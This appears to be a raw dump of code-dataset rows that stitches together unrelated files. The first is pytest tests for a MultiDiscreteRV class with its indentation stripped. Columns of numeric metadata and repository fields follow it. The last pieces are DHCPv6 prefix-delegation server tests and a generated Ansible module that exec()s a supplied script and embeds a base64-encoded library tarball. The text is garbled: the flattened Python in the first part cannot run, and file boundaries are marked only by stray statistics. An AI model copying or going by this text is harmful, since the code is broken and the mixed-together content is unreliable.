with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1, x3=3)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1, x3=3)
random_v = MultiDiscreteRV(
("a", 1, "w1"),
["X1", "X2", "X3"],
)
with pytest.raises(ValueError):
random_v.to_key()
with pytest.raises(ValueError):
random_v.to_key(1)
with pytest.raises(ValueError):
random_v.to_key(1, 2)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4)
with pytest.raises(ValueError):
random_v.to_key(x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 4, x1=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1, x3=1, x4=2)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1, x3=1, x4=2)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2)
random_v = MultiDiscreteRV(
(1, 2, 4, 2),
["X1", "X2", "X3", "X4"],
)
with pytest.raises(ValueError):
random_v.to_key()
with pytest.raises(ValueError):
random_v.to_key(1)
with pytest.raises(ValueError):
random_v.to_key(1, 2)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4, 5)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4, 5, 6)
with pytest.raises(ValueError):
random_v.to_key(x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4, 5, x1=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1, x3=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1, x3=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1, x3=1, x4=2)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1, x4=2)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1, x3=1, x4=2, x5=5)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1, x3=1, x4=2, x5=5)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2, x5=5)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1, x4=2, x5=5)
def test_to_key_multidiscreterv():
random_v = MultiDiscreteRV(1, ["X1"])
assert random_v.to_key(2) == 2
assert random_v.to_key(X1=2) == 2
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert random_v.to_key(1, 2) == (1, 2)
assert random_v.to_key(1, X2=2) == (1, 2)
assert random_v.to_key(2, X1=1) == (1, 2)
assert random_v.to_key(X1=1, X2=2) == (1, 2)
assert random_v.to_key(X2=2, X1=1) == (1, 2)
random_v = MultiDiscreteRV(
("a", 1, "w1"),
["X1", "X2", "X3"],
)
assert random_v.to_key("a", 1, "w1") == ("a", 1, "w1")
assert random_v.to_key("a", 1, X3="w1") == ("a", 1, "w1")
assert random_v.to_key("a", "w1", X2=1) == ("a", 1, "w1")
assert random_v.to_key(1, "w1", X1="a") == ("a", 1, "w1")
assert random_v.to_key("a", X2=1, X3="w1") == ("a", 1, "w1")
assert random_v.to_key(1, X1="a", X3="w1") == ("a", 1, "w1")
assert random_v.to_key("w1", X1="a", X2=1) == ("a", 1, "w1")
assert random_v.to_key("a", X3="w1", X2=1) == ("a", 1, "w1")
assert random_v.to_key(1, X3="w1", X1="a") == ("a", 1, "w1")
assert random_v.to_key("w1", X2=1, X1="a") == ("a", 1, "w1")
assert random_v.to_key(X1="a", X2=1, X3="w1") == ("a", 1, "w1")
assert random_v.to_key(X1="a", X3="w1", X2=1) == ("a", 1, "w1")
assert random_v.to_key(X2=1, X1="a", X3="w1") == ("a", 1, "w1")
assert random_v.to_key(X2=1, X3="w1", X1="a") == ("a", 1, "w1")
assert random_v.to_key(X3="w1", X1="a", X2=1) == ("a", 1, "w1")
assert random_v.to_key(X3="w1", X2=1, X1="a") == ("a", 1, "w1")
random_v = MultiDiscreteRV(
("a", 1, "w1", 4),
["X1", "X2", "X3", "X4"],
)
assert random_v.to_key("a", 1, "w1", 4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", 1, "w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", 1, 4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key("a", "w1", 4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(1, "w1", 4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key("a", 1, X3="w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", 1, X4=4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key("a", "w1", X2=1, X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", "w1", X4=4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(1, "w1", X1="a", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(1, "w1", X4=4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key("a", 4, X2=1, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key("a", 4, X3="w1", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(1, 4, X1="a", X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(1, 4, X3="w1", X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key("w1", 4, X1="a", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key("w1", 4, X2=1, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key("a", X2=1, X3="w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", X3="w1", X2=1, X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("a", X3="w1", X4=4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key("a", X2=1, X4=4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(1, X1="a", X3="w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(1, X3="w1", X1="a", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(1, X3="w1", X4=4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(1, X1="a", X4=4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key("w1", X1="a", X2=1, X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("w1", X2=1, X1="a", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key("w1", X2=1, X4=4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key("w1", X1="a", X4=4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(4, X1="a", X2=1, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(4, X2=1, X1="a", X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(4, X2=1, X3="w1", X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(4, X1="a", X3="w1", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X1="a", X2=1, X3="w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X1="a", X2=1, X4=4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(X1="a", X3="w1", X2=1, X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X1="a", X3="w1", X4=4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X1="a", X3="w1", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X1="a", X4=4, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X3="w1", X1="a", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X3="w1", X4=4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X4=4, X3="w1", X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(X2=1, X4=4, X1="a", X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X1="a", X2=1, X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X1="a", X4=4, X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X2=1, X1="a", X4=4) == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X2=1, X4=4, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X4=4, X1="a", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X3="w1", X4=4, X2=1, X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X1="a", X2=1, X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X1="a", X3="w1", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X2=1, X1="a", X3="w1") == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X2=1, X3="w1", X1="a") == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X3="w1", X1="a", X2=1) == ("a", 1, "w1", 4)
assert random_v.to_key(X4=4, X3="w1", X2=1, X1="a") == ("a", 1, "w1", 4)
def test_to_dict_key_multidiscreterv():
random_v = MultiDiscreteRV(1, ["X1"])
# assert random_v.to_dict_key(2) == {"X1": 2}
# assert random_v.to_dict_key(X1=2) == {"X1": 2}
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert random_v.to_dict_key(1, 2) == {"X1": 1, "X2": 2}
assert random_v.to_dict_key(1, X2=2) == {"X1": 1, "X2": 2}
assert random_v.to_dict_key(X1=1, X2=2) == {"X1": 1, "X2": 2}
random_v = MultiDiscreteRV(
("a", 1, "w1"),
["X1", "X2", "X3"],
)
assert random_v.to_dict_key("a", 1, "w1") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key("a", 1, X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key("a", X2=1, X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key(1, X1="a", X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key(1, X3="w1", X1="a") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key("w1", X2=1, X1="a") == {"X1": "a", "X2": 1, "X3": "w1"}
assert random_v.to_dict_key(X1="a", X2=1, X3="w1") == {
"X1": "a",
"X2": 1,
"X3": "w1",
}
assert random_v.to_dict_key(X3="w1", X1="a", X2=1) == {
"X1": "a",
"X2": 1,
"X3": "w1",
}
random_v = MultiDiscreteRV(
("a", 1, "w1", 4),
["X1", "X2", "X3", "X4"],
)
assert random_v.to_dict_key("a", 1, "w1", 4) == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
assert random_v.to_dict_key("a", 1, "w1", X4=4) == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
assert random_v.to_dict_key("a", 1, X3="w1", X4=4) == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
assert random_v.to_dict_key("a", X2=1, X3="w1", X4=4) == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
assert random_v.to_dict_key(X1="a", X2=1, X3="w1", X4=4) == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
assert random_v.to_dict_key(X2=1, X1="a", X4=4, X3="w1") == {
"X1": "a",
"X2": 1,
"X3": "w1",
"X4": 4,
}
| 37.787671
| 87
| 0.535738
| 2,920
| 16,551
| 2.879795
| 0.015068
| 0.205613
| 0.169105
| 0.198359
| 0.960518
| 0.944702
| 0.93507
| 0.925318
| 0.910096
| 0.882269
| 0
| 0.107036
| 0.232312
| 16,551
| 437
| 88
| 37.874142
| 0.554777
| 0.006888
| 0
| 0.575064
| 0
| 0
| 0.056719
| 0
| 0
| 0
| 0
| 0
| 0.386768
| 1
| 0.017812
| false
| 0
| 0.005089
| 0
| 0.022901
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
330aecd80cfef8d583643e23557497bc06e813d2
| 8,486
|
py
|
Python
|
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""DHCPv6 Prefix Delegation"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_msg
import references
import srv_control
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
def test_prefix_delegation_onlyPD_renew():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_onlyPD_renew_nobinding():
# this tests will be disabled after RFC 7550 tests will be added
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '13')
srv_msg.response_check_suboption_content('Response', '13', '25', None, 'statuscode', '3')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_onlyPD_renew_nobinding_new_IA_PD():
# this tests will be disabled after RFC 7550 tests will be added
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.generate_new('IA_PD')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '13')
srv_msg.response_check_suboption_content('Response', '13', '25', None, 'statuscode', '3')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
def test_prefix_delegation_IA_and_PD_renew():
# this tests will be disabled after RFC 7550 tests will be added
misc.test_setup()
# Server is configured with 3000::/64 subnet with 3000::1-3000::3 pool.
srv_control.config_srv_subnet('3000::/64', '3000::ffff:ffff:1-3000::ffff:ffff:3')
srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_save_option('IA_PD')
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_PD')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '4000')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
@pytest.mark.disabled
def test_prefix_delegation_IA_and_PD_renew_nobindig():
# this tests will be disabled after RFC 7550 tests will be added
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::3')
srv_control.config_srv_prefix('2001:db8:1::', '0', '90', '92')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'IA-PD')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '25')
srv_msg.response_check_option_content('Response', '25', None, 'sub-option', '26')
# Response sub-option 13 from option 25 MUST contain statuscode 3. changed after rfc7550
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '13')
srv_msg.response_check_suboption_content('Response', '13', '3', None, 'statuscode', '3')
references.references_check('RFC')
| 37.38326
| 93
| 0.723898
| 1,248
| 8,486
| 4.576122
| 0.084135
| 0.090352
| 0.096656
| 0.0865
| 0.941166
| 0.940816
| 0.935038
| 0.919979
| 0.909648
| 0.909648
| 0
| 0.038824
| 0.125854
| 8,486
| 226
| 94
| 37.548673
| 0.73106
| 0.05621
| 0
| 0.889535
| 0
| 0
| 0.170564
| 0.004377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| true
| 0.069767
| 0.02907
| 0
| 0.05814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
331baf1bfb03f4267878d1f322d21fa59467987c
| 73,482
|
py
|
Python
|
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
ansible/roles/openshift_client_python/library/openshift_client_python.py
|
elenagerman/openshift-client-python
|
a6c97f8c9ac40df9eeef8f1af599c9e3a7cb63ad
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# THIS IS A GENERATED FILE. DO NOT MODIFY IT
# Modify: openshift_client_python.template.py and then run rebuild_module.sh to affect this file
from __future__ import print_function
from __future__ import absolute_import
from ansible.module_utils.basic import AnsibleModule
import os
import six
import tempfile
import shutil
import tarfile
import base64
import sys
import pprint
# Allows modules to trigger errors
def error(msg, **kwargs):
import openshift as oc
raise oc.OpenShiftPythonException(msg, **kwargs)
def main():
import openshift as oc
script = module.params["script"]
time = module.params["timeout"]
oc.ansible.reset()
oc.ansible.vars = module.params["vars"]
if time is not None:
time = int(time) # Allow time to come in as a string
if module.params["project"] is not None:
oc.context.default_project = module.params["project"]
with oc.timeout(time):
with oc.tracking() as ct:
try:
with oc.util.OutputCapture() as capture:
exec(script)
module.debug("openshift_client_python module invocation result:\n" + str(ct.get_result()))
module.exit_json(rc=ct.get_result().status(),
changed=module.params['changes'],
ansible_facts=oc.ansible.new_facts,
stdout=capture.out.getvalue().decode('UTF-8'),
stderr=capture.err.getvalue().decode('UTF-8'),
result=ct.get_result().as_dict()
)
except oc.OpenShiftPythonException as ose:
module.debug("openshift_client_python module invocation exception: " + str(ose))
module.debug("openshift_client_python module invocation result:\n" + str(ct.get_result()))
module.fail_json(msg=ose.msg,
rc=ose.result.status(),
exception_attributes=ose.attributes(),
changed=module.params['changes'] or oc.ansible.changed,
ansible_facts=oc.ansible.new_facts,
stdout=capture.out.getvalue().decode('UTF-8'),
stderr=capture.err.getvalue().decode('UTF-8'),
result=ct.get_result().as_dict()
)
except KeyboardInterrupt:
print('Received KeyboardInterrupt during module', file=sys.stderr)
pprint.pprint(ct.get_result().as_dict(), stream=sys.stderr)
raise
if __name__ == '__main__':
# When openshift-client-python/ansible/rebuild_module.sh is executed, it will read in this template
# and replace the following variable with a b64 encoded tarball of the openshift-client-library
# package. The client_python_extract_dir path will contain the 'openshift' package directory.
REPLACED_BY_REBUILD_MODULE = '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